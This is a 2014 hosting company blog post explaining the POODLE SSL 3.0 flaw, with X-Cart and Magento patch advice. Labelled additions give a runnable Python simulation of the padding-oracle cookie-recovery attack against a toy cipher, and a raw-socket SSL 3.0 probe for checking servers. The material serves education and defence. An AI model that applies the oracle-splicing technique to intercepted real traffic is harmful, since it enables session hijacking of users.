Poodle Vulnerability - X-Cart, Magento & Hosting Updates

  • November 11, 2014 by Alex Skorohodov

Google researchers have found a severe flaw in an obsolete but still widely supported encryption protocol, SSL 3.0. It can be exploited to steal sensitive data, and the fix (disabling SSL 3.0) can break the Web for users of older web browsers.

SSL 3.0 is more than 15 years old, but modern web browsers and servers still support it. SSL stands for “Secure Sockets Layer”; it and its successor TLS (Transport Layer Security) encrypt data between a client and a server and protect most sensitive traffic on the Internet. Browsers are designed to negotiate the newest TLS version a server supports, but most will fall back to SSL 3.0 if that is all the other end can do, or appears to be able to do.

POODLE works in two stages. First the attacker, sitting between the browser and the server, interferes with the TLS handshake until the browser retries with SSL 3.0 (the compatibility “fallback” most browsers performed). Then it exploits a weakness in SSL 3.0’s CBC padding: the padding bytes are not covered by the MAC and their content is never checked, so by making the victim’s browser send many requests (typically via script injected into an unencrypted page) and splicing ciphertext blocks around, the attacker can decrypt one byte of the encrypted request for roughly every 256 requests. The usual target is a session cookie, the token that keeps a user logged in to an online service. A stolen cookie could give an attacker access to someone’s Web-based email account, for example.

An attacker has to be in a position to intercept and modify the victim’s traffic (a man-in-the-middle) to conduct this attack. That might be possible in a public area, such as over a Wi-Fi network in an airport.
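The padding-oracle stage described above, as an added, runnable simulation (not code from the original post, from Google or from X-Cart). It keeps exactly what the attack depends on, CBC mode plus SSL 3.0’s unchecked padding, and replaces everything else with stand-ins that are assumptions of this example: a small SHA-256 Feistel permutation instead of AES, HMAC-SHA1 instead of the SSL 3.0 MAC, a constructed cookie value, and a `client_request` function playing the role of the victim’s browser being driven by the attacker’s script.

```python
import hashlib
import hmac
import os

BLOCK = 16        # block size of the toy cipher (AES-sized)
MAC_LEN = 20      # SHA-1 MAC length, as in SSL 3.0's common CBC cipher suites
ENC_KEY = os.urandom(16)   # session keys; the attacker never learns these
MAC_KEY = os.urandom(16)
COOKIE = b"session=deadbeefcafef00d"   # constructed sample secret

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key, rnd, half):
    # Feistel round function: keyed SHA-256 truncated to half a block.
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:BLOCK // 2]

def block_encrypt(key, blk):
    # 4-round Feistel permutation standing in for AES. The attack does not
    # depend on the block cipher, only on CBC mode plus SSL 3.0 padding.
    l, r = blk[:BLOCK // 2], blk[BLOCK // 2:]
    for rnd in range(4):
        l, r = r, _xor(l, _f(key, rnd, r))
    return l + r

def block_decrypt(key, blk):
    l, r = blk[:BLOCK // 2], blk[BLOCK // 2:]
    for rnd in reversed(range(4)):
        l, r = _xor(r, _f(key, rnd, l)), l
    return l + r

def cbc_encrypt(key, iv, data):
    out, prev = [], iv
    for i in range(0, len(data), BLOCK):
        prev = block_encrypt(key, _xor(data[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key, iv, data):
    out, prev = [], iv
    for i in range(0, len(data), BLOCK):
        out.append(_xor(block_decrypt(key, data[i:i + BLOCK]), prev))
        prev = data[i:i + BLOCK]
    return b"".join(out)

def ssl3_pad(data):
    # SSL 3.0 padding: last byte = number of pad bytes before it; those bytes
    # are arbitrary and not covered by the MAC. That is the flaw POODLE uses.
    n = BLOCK - 1 - len(data) % BLOCK
    return data + os.urandom(n) + bytes([n])

def client_request(prefix_len, suffix_len):
    # The victim's browser sends prefix || cookie || suffix over SSL 3.0. The
    # attacker's injected script chooses the path and body lengths.
    msg = b"/" * prefix_len + COOKIE + b"&" * suffix_len
    mac = hmac.new(MAC_KEY, msg, "sha1").digest()   # HMAC stands in for the SSL 3.0 MAC
    iv = os.urandom(BLOCK)
    return iv, cbc_encrypt(ENC_KEY, iv, ssl3_pad(msg + mac))

def server_accepts(iv, record):
    # The oracle: strip padding by the last byte only, then verify the MAC.
    pt = cbc_decrypt(ENC_KEY, iv, record)
    n = pt[-1]
    if n >= BLOCK or len(pt) < n + 1 + MAC_LEN:
        return False
    body = pt[:len(pt) - n - 1]
    tag = hmac.new(MAC_KEY, body[:-MAC_LEN], "sha1").digest()
    return hmac.compare_digest(tag, body[-MAC_LEN:])

def recover_cookie_byte(j):
    # Place cookie byte j last in some block k and make the padding a whole
    # block, then swap the padding block for C_k until the server accepts.
    prefix_len = (BLOCK - 1 - j) % BLOCK
    suffix_len = -(prefix_len + len(COOKIE) + MAC_LEN) % BLOCK
    k = (prefix_len + j) // BLOCK
    queries = 0
    while True:
        iv, ct = client_request(prefix_len, suffix_len)
        blocks = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
        forged = ct[:-BLOCK] + blocks[k + 1]   # blocks[k + 1] is C_k (blocks[0] is the IV)
        queries += 1
        if server_accepts(iv, forged):
            # Accepted means D(C_k) xor C_{N-2} ends in BLOCK-1, and
            # D(C_k) = P_k xor C_{k-1}, so the last byte of P_k is:
            return (BLOCK - 1) ^ blocks[k][-1] ^ blocks[-2][-1], queries

def recover_cookie(length):
    # Returns the recovered cookie and the number of oracle queries used
    # (about 256 per byte on average).
    out, total = bytearray(), 0
    for j in range(length):
        b, q = recover_cookie_byte(j)
        out.append(b)
        total += q
    return bytes(out), total

if __name__ == "__main__":
    cookie, queries = recover_cookie(len(COOKIE))
    print(cookie, "recovered with", queries, "requests")
```

Nothing in the loop needs the keys: the attacker only moves ciphertext blocks and watches whether the server accepts or rejects the record, which in the real protocol is the difference between a normal response and a fatal alert. TLS 1.0 and later are not vulnerable to this particular trick because their padding bytes must all equal the padding length, so a spliced block is rejected with overwhelming probability.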

The Kosmos response

As always, we take every bug very seriously. Our engineering team was immediately on it and implemented the following measures as of October 20, 2014:

·         We have removed SSL 3.0 on all of our servers.

·         If you connect to a third-party application (Authorize.net AIM, PayPal Pro, UPS, FedEx, Avalara, etc.), note that these platforms, and thousands more, are also discontinuing support for SSL 3.0.
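A way to verify the first measure above, that a server no longer negotiates SSL 3.0, as an added example that is not Kosmos's or X-Cart's own tooling. Python's `ssl` module will not build an SSLv3 context any more, so the probe hand-builds an SSL 3.0 ClientHello and sends it over a raw socket; a ServerHello carrying version 3.0 means the server still accepts the protocol, while an alert or a closed connection means it refuses. The cipher-suite list is an illustrative selection, and the host name is whatever you pass on the command line.

```python
import os
import socket
import struct

SSLV3 = b"\x03\x00"   # protocol version bytes for SSL 3.0

# A handful of cipher suites an SSL 3.0 server would recognise (IANA code points).
CIPHER_SUITES = [
    0x0035,  # TLS_RSA_WITH_AES_256_CBC_SHA
    0x002F,  # TLS_RSA_WITH_AES_128_CBC_SHA
    0x0039,  # TLS_DHE_RSA_WITH_AES_256_CBC_SHA
    0x000A,  # TLS_RSA_WITH_3DES_EDE_CBC_SHA
    0x0005,  # TLS_RSA_WITH_RC4_128_SHA
]

def build_sslv3_client_hello(client_random=None):
    """Build a raw SSL 3.0 ClientHello: version 3.0 in both the record and
    handshake headers, no extensions (SSL 3.0 has none)."""
    client_random = client_random or os.urandom(32)
    suites = b"".join(struct.pack("!H", s) for s in CIPHER_SUITES)
    body = (
        SSLV3                                      # client_version
        + client_random                            # 32 bytes of client random
        + b"\x00"                                  # session_id: empty
        + struct.pack("!H", len(suites)) + suites  # cipher_suites
        + b"\x01\x00"                              # compression_methods: null only
    )
    # Handshake header: type 1 (ClientHello) + 3-byte length.
    handshake = b"\x01" + struct.pack("!I", len(body))[1:] + body
    # Record header: type 22 (handshake), version, 2-byte length.
    return b"\x16" + SSLV3 + struct.pack("!H", len(handshake)) + handshake

def classify_response(data):
    """Classify the first bytes the server sends back to the SSL 3.0 hello.
    Returns (verdict, detail)."""
    if len(data) < 5:
        return ("closed", None)          # EOF/reset without a record: SSLv3 refused
    ctype = data[0]
    if ctype == 0x15:                    # alert record
        desc = data[6] if len(data) >= 7 else None   # 40 = handshake_failure, 70 = protocol_version
        return ("refused_alert", desc)
    if ctype == 0x16 and len(data) >= 11 and data[5] == 0x02:   # handshake: ServerHello
        version = bytes(data[9:11])      # server_version chosen by the peer
        if version == SSLV3:
            return ("accepts_sslv3", None)   # still exposed to POODLE
        return ("server_hello_other_version", version.hex())
    return ("other", ctype)

def probe(host, port=443, timeout=5.0):
    """Send the SSL 3.0 ClientHello to host:port and classify what comes back."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_sslv3_client_hello())
        try:
            data = sock.recv(4096)
        except (ConnectionResetError, socket.timeout):
            data = b""
    return classify_response(data)

if __name__ == "__main__":
    import sys
    host = sys.argv[1] if len(sys.argv) > 1 else "localhost"
    print(host, probe(host))
```

Run it against each hostname and port your store and its payment and shipping integrations talk to; the only acceptable verdicts are `closed`, `refused_alert` or a ServerHello with a TLS version. Older OpenSSL builds offer the same check as `openssl s_client -ssl3 -connect host:443`, but newer builds are compiled without SSLv3 and reject the flag, which is why the raw-socket version is kept here.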

 

This information is relevant to you if you are using any eCommerce software application.

Affected X-Cart versions: 4.2.2 - 4.6.4, all editions (Gold, GoldPlus, Platinum, Pro)

NOT affected: 4.6.5 (the latest at the time of writing); all versions of X-Cart 5.x


Magento & Poodle

 

For Magento, you will also have to apply the appropriate patches.

Magento users, see the Magento Stack Exchange post on handling the POODLE vulnerability here:

http://magento.stackexchange.com/questions/40282/how-to-manage-the-ssl3-poodle-vulnerability

Applying these patches is a must if you use:

·  PayPal Advanced;

·  UPS;

·  Authorize.Net CIM (in older X-Cart versions, through 4.4.5).

The services above have already announced their intention to disable SSLv3 support because of the POODLE vulnerability (see the article linked at the end of this post). The timeframes differ, but once it happens, the current integration will stop working. To continue using their services you must patch your store; the sooner, the better.

I don't use the above, do I need the patch?
Applying these patches is strongly recommended in any case. If you use any third-party application to send or receive data, then yes. Even if your store does not use the services listed above, it may use other services that are also planning changes to their platforms and implementing security patches.

What the X-Cart patch does:
These patches update your store's HTTPS modules and help avoid problems with HTTPS requests sent by your store to various services. Integrations with these services (including UPS, PayPal Advanced and Authorize.Net CIM, but probably not limited to this list) may stop working in the near future when those services remove support for the outdated and vulnerable SSLv3 protocol.

 

How long does it take to implement the X-Cart patch?
Applying these patches normally takes about an hour.


See the PCWorld article on POODLE here:

http://www.pcworld.com/article/2834015/security-experts-warn-of-poodle-attack-against-ssl-30.html